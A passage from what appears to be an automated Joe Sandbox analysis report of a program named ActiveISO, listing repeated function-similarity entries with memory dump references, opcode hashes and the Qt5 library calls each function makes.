                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array@@Byte$?fromArrayAscii_helper@Data@Typed$?data@Latin1@Settings@@memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1530121857-0
                                                                                                                  • Opcode ID: 952acb996e82d4914cf40ee3610d23c40843e246696fde0030a71c0183b4f5b2
                                                                                                                  • Instruction ID: f27e3768b096ab4287a9d07ac412bf630a0325805d8d77a069c50d19a39ab0aa
                                                                                                                  • Opcode Fuzzy Hash: 952acb996e82d4914cf40ee3610d23c40843e246696fde0030a71c0183b4f5b2
                                                                                                                  • Instruction Fuzzy Hash: D1016921E1854152E600D764F4560BAA361EB91B90F480631E6EEE76F9EE2DD558C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2291827984-0
                                                                                                                  • Opcode ID: 56b0e6239326a931c6bc954485bde25d1fed1a47eb8521078114160063e9fe02
                                                                                                                  • Instruction ID: c898a13a7e775168312aae8e2eeb2fc2400bd555c1f4538908bf6f96c7933c4c
                                                                                                                  • Opcode Fuzzy Hash: 56b0e6239326a931c6bc954485bde25d1fed1a47eb8521078114160063e9fe02
                                                                                                                  • Instruction Fuzzy Hash: F7015631A1965182F6544B56A81542DB361FB89FF0B188234DE6DA3BD4DF3CD0524704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3856165540-0
                                                                                                                  • Opcode ID: 671ffd430f0fee0fc018878b2ffd9550a15d96958d4488f474857302fe056e0a
                                                                                                                  • Instruction ID: 1282d6e305b2d4ea25e906568fa83b7a8fea175b5e89e39a5370df671bfa5844
                                                                                                                  • Opcode Fuzzy Hash: 671ffd430f0fee0fc018878b2ffd9550a15d96958d4488f474857302fe056e0a
                                                                                                                  • Instruction Fuzzy Hash: CF018D22E1C64151EA10D764F4430AAA361FFC5BA0F580235E6AEE76E9EF2CE509C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3856165540-0
                                                                                                                  • Opcode ID: 256c75b53af06b8d7cb92bd3bcd34c606f2396b3a8616311f5422d2a68e360a8
                                                                                                                  • Instruction ID: 483a8973a8de7bbd0d874a729e5df1b2c34127703fc4ea0b1a2980dbf7cb7da9
                                                                                                                  • Opcode Fuzzy Hash: 256c75b53af06b8d7cb92bd3bcd34c606f2396b3a8616311f5422d2a68e360a8
                                                                                                                  • Instruction Fuzzy Hash: C1018D22E1C54152EA10D764F4420AAA371FFC1BA0F580235E6EEE76E9DF3CD509C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3856165540-0
                                                                                                                  • Opcode ID: 731d39543d8693fefc95a6f2932139c47644391257b422e2ef9b08da67a74fd8
                                                                                                                  • Instruction ID: ec42eafada8da8f4cbd11e8582a098050714d1855788a7c48da642462e82b227
                                                                                                                  • Opcode Fuzzy Hash: 731d39543d8693fefc95a6f2932139c47644391257b422e2ef9b08da67a74fd8
                                                                                                                  • Instruction Fuzzy Hash: 17018821E3964251EA00DB60E4420B99322FF92B60F490130EBEEF76E5FF2CE519C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?dispose@ExceptionThrow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1051636472-0
                                                                                                                  • Opcode ID: 2bd849ed943e9306ca7259ae5c52b61c44226d404ccf16410f0e12d9dab40981
                                                                                                                  • Instruction ID: f67efbe4a360a45d3a9fa14c0dd542367ba5bb01e98bf1cb6f8037b1dff68e81
                                                                                                                  • Opcode Fuzzy Hash: 2bd849ed943e9306ca7259ae5c52b61c44226d404ccf16410f0e12d9dab40981
                                                                                                                  • Instruction Fuzzy Hash: 29F05462E19B4585EB08DF629A9217C2323FB85FC4F084031DE0EA3B15CF3CD0558781
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3856165540-0
                                                                                                                  • Opcode ID: 188737e6b1f0d4abba11a7eb0d97c277f0cf8ed0c769e46fbbe6b25e56faea79
                                                                                                                  • Instruction ID: aa8fd2a0ebe0c17070823c8de509035baae57c229ad87ad4ebde5aef0e3b462b
                                                                                                                  • Opcode Fuzzy Hash: 188737e6b1f0d4abba11a7eb0d97c277f0cf8ed0c769e46fbbe6b25e56faea79
                                                                                                                  • Instruction Fuzzy Hash: E2F08B11E3954192F600D760E4560BA5361FFC2B60F480231E6AEF35E4EF2CE508C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@V0@@_time64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 557253069-0
                                                                                                                  • Opcode ID: 396d5d7126456a88861304e82ee2af1eed668a3bfb79be8e4f50c23e14346090
                                                                                                                  • Instruction ID: c352041684a1761c3f00ab1ccac7679dde3d718a381ca7ec74a9db6d8242149a
                                                                                                                  • Opcode Fuzzy Hash: 396d5d7126456a88861304e82ee2af1eed668a3bfb79be8e4f50c23e14346090
                                                                                                                  • Instruction Fuzzy Hash: 83F08661E3954192EA00DB60E456079A321FFD2B60F980235E6EEF76E4EF2CE508C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3856165540-0
                                                                                                                  • Opcode ID: 06e8926484c3382173be0a29a471a9b57ae1f3056b197e787e33ec332bf4e407
                                                                                                                  • Instruction ID: feb60f1491c91db199d07b524b7416cd9f9540b7443eb7c7c7aea2ac7cfcf163
                                                                                                                  • Opcode Fuzzy Hash: 06e8926484c3382173be0a29a471a9b57ae1f3056b197e787e33ec332bf4e407
                                                                                                                  • Instruction Fuzzy Hash: 54F06211E3954292FA00D760E8560BA9361FF82B60F880235E6EEE26E4EF2CE508C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3856165540-0
                                                                                                                  • Opcode ID: 36d17bfab43bdde5861cdecd2099020f87781b9f33ede81ea9fc77e8743a3b2a
                                                                                                                  • Instruction ID: 53892141c2e199fb08c418b9af5ebf942a7f1f7efa69bfec3056804ada6bb56a
                                                                                                                  • Opcode Fuzzy Hash: 36d17bfab43bdde5861cdecd2099020f87781b9f33ede81ea9fc77e8743a3b2a
                                                                                                                  • Instruction Fuzzy Hash: ECF08611E3954292EA00D770E85707A9361FF82B60F880231E6AEF76E4EF2CE509C708
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Object@@@Thread@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3926244378-0
                                                                                                                  • Opcode ID: 33a14f1dd29884c8d7774d4dcbe603edc49936566a3f70f56eaa9145759f6ddf
                                                                                                                  • Instruction ID: 9ccd4fb456d223fbca358fae68d8fc79dff730e486f4947b0d8d959eaba09599
                                                                                                                  • Opcode Fuzzy Hash: 33a14f1dd29884c8d7774d4dcbe603edc49936566a3f70f56eaa9145759f6ddf
                                                                                                                  • Instruction Fuzzy Hash: 7C011D32915F819AE7409F74E88636933E9FB4AF09F091134DA8DE6364EF38D498C355
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?set?windowArray@@Bar@@ByteProgressTitle@V0@$$V0@@Value@Widget@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2109686161-0
                                                                                                                  • Opcode ID: 1c32f4ebf339a67768a956baa2e2ed83f053d44cc48c14209af97e08cfde39a2
                                                                                                                  • Instruction ID: 92bc86c1c1b11587641624f4059423ff0893c48ad0ceac92d6e9d790b6b7ac9f
                                                                                                                  • Opcode Fuzzy Hash: 1c32f4ebf339a67768a956baa2e2ed83f053d44cc48c14209af97e08cfde39a2
                                                                                                                  • Instruction Fuzzy Hash: 6901FB36B24E41D2EB04CB2AD58506D6362FFC8F94B185032DB0E97B24DF38D4A9C344
                                                                                                                  APIs
                                                                                                                  • ?readAll@QIODevice@@QEAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF6537488D6
                                                                                                                  • ??0QString@@QEAA@AEBVQByteArray@@@Z.QT5CORE ref: 00007FF6537488E7
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653748924
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF653748930
                                                                                                                    • Part of subcall function 00007FF6537454D0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537454FE
                                                                                                                    • Part of subcall function 00007FF6537454D0: ?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF653745518
                                                                                                                    • Part of subcall function 00007FF6537454D0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745527
                                                                                                                    • Part of subcall function 00007FF6537454D0: ?mid@QString@@QEBA?AV1@HH@Z.QT5CORE ref: 00007FF653745540
                                                                                                                    • Part of subcall function 00007FF6537454D0: ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FF653745550
                                                                                                                    • Part of subcall function 00007FF6537454D0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374555A
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742A5A
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742A65
                                                                                                                    • Part of subcall function 00007FF653742A00: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742A7C
                                                                                                                    • Part of subcall function 00007FF653742A00: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742AA0
                                                                                                                    • Part of subcall function 00007FF653742A00: ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF653742AAE
                                                                                                                    • Part of subcall function 00007FF653742A00: ?toString@QDate@@QEBA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FF653742ABF
                                                                                                                    • Part of subcall function 00007FF653742A00: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742ACD
                                                                                                                    • Part of subcall function 00007FF653742A00: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742AE0
                                                                                                                    • Part of subcall function 00007FF653742A00: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF653742AF6
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742B01
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742B0C
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742B17
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742B22
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742B2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@ByteData@Typed$Array@@$Date@@Settings@@Variant@@$?current?index?mid@?read?setAll@Array@@@CaseDate@Device@@Qt@@@Sensitivity@String@String@@@V0@$$V0@@V2@@Value@Variant@@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1220404134-0
                                                                                                                  • Opcode ID: 622d8613fa4c7b750b5b23583f226266c760911a5b5800e1c9ec4fefc0dda14e
                                                                                                                  • Instruction ID: 3507a5ddc29737eb009c79b0fba6385ec7d74946814775b3ec39b510bf0e6afc
                                                                                                                  • Opcode Fuzzy Hash: 622d8613fa4c7b750b5b23583f226266c760911a5b5800e1c9ec4fefc0dda14e
                                                                                                                  • Instruction Fuzzy Hash: 87F0A222918A41E2EA00DF58E44116DA331FBC2B65F940230D79DA35F4CF6DD50AC744
                                                                                                                  APIs
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF65375487B
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537422DB
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF6537422FE
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742311
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374232B
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742337
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742343
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653742353
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF65374235F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653754890
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF65375489F
                                                                                                                    • Part of subcall function 00007FF6537425E0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537425FB
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374261E
                                                                                                                    • Part of subcall function 00007FF6537425E0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742631
                                                                                                                    • Part of subcall function 00007FF6537425E0: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374264B
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742657
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742663
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF65374266F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537548B4
                                                                                                                  Memory Dump Source
